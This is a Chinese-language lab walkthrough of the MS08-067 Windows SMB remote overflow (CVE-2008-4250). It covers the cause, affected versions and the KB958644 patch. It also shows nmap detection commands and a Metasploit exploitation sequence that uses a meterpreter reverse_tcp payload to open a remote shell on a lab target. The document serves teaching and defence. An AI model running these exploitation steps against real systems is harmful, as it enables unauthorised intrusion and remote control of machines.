# 3.7.2 ms08-067

## 漏洞名称

MS08-067远程溢出漏洞（CVE-2008-4250）

## 漏洞等级

高危

## 漏洞描述

MS08-067 漏洞是通过MSRPC over SMB通道调用Server程序中的NEtPathCanonicalize函数时触发的。

NetPathCanonicalize 函数在远程访问其他主机时，会调用NetpwPathCanonicalize函数，对远程访问的路径进行规范化，而在NetpwPathCanonicalize函数中发生了栈缓冲区内存错误，造成可被利用实施远程代码执行。

## 漏洞影响

MS08-067漏洞将会影响除Windows Server 2008 Core以外的所有Windows系统，包括：Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本，甚至还包括测试阶段的Windows 7 Pro-Beta

## 漏洞复现

### 实验环境

操作机 ：Kali 2017

操作机IP：172.16.11.2

目标机：Windows XP S2 中文版

目标机IP：172.16.12.2

实验步骤

第1步 漏洞探测 打开Kali终端，使用Nmap对目标机开放端口进行扫描

> nmap -sV -Pn 172.16.12.2

![](http://ww1.sinaimg.cn/large/0065jC22ly1g0t0bqu46oj30jl09gtdi.jpg)

目标机开放了135`139`445\`\`3389端口，且目标机系统为Windows\_XP。一想到XP或者2003系统的445端口开放，我们就能想到轰动一时的ms08-067。

我们使用nmap的漏洞扫描脚本查看漏洞是否可用

> nmap -sV -Pn -p 445 --script smb-vuln-ms08-067.nse 172.16.12.2

![](http://ww1.sinaimg.cn/large/0065jC22ly1g0t0eyn0q9j30jw09bdlh.jpg)

扫描结果VULNERABLE,可以利用

第2步 漏洞利用

终端内输入msfconsole打开 metasploite 命令行客户端，使用search命令查找ms08-067的漏洞利用模块

![](http://ww1.sinaimg.cn/large/0065jC22ly1g0t0igzgocj30ea069gmy.jpg)

使用该模块，并查看配置

![](http://ww1.sinaimg.cn/large/0065jC22ly1g0t0jv2t01j30kr07w76e.jpg)

需要设置目标地址，设置命令：

> set RHOST 172.16.12.2

之后，选择载荷payload，也就是shellcode,此处我们选择回连至控制端shell的payload

> set payload windows/meterpreter/reverse\_tcp

当然载荷也需要进行配置，所以我们选择渗透所用的载荷后，同样使用show options查看配置信息

配置中缺少本地主机 RHOST，设置一下

MS08-067 针对不同的系统可以选择不同的target,使用命令show targets可以看见支持的系统

我们选择此次目标机的系统，编号10 set target 10

配置完成后如下

![](http://ww1.sinaimg.cn/large/0065jC22ly1g0t0osg627j30l107b0uy.jpg)

成功获取来自目标主机的Session会话

![](http://ww1.sinaimg.cn/large/0065jC22ly1g0t0qn7d95j30lc04dwgx.jpg)

第3步：Meterpreter常用命令

我们已经成功的获取Session会话了，接下来，我们使用meterpreter的一些常用基本功能

sysinfo

使用sysinfo命令可以查看目标系统的基本信息

shell

shell 命令用于获取一个可以交互的shell，方便执行系统命令

![](http://ww1.sinaimg.cn/large/0065jC22ly1g0t0tc32lyj30kw05kjse.jpg)

## 漏洞修复

相关补丁

KB958644
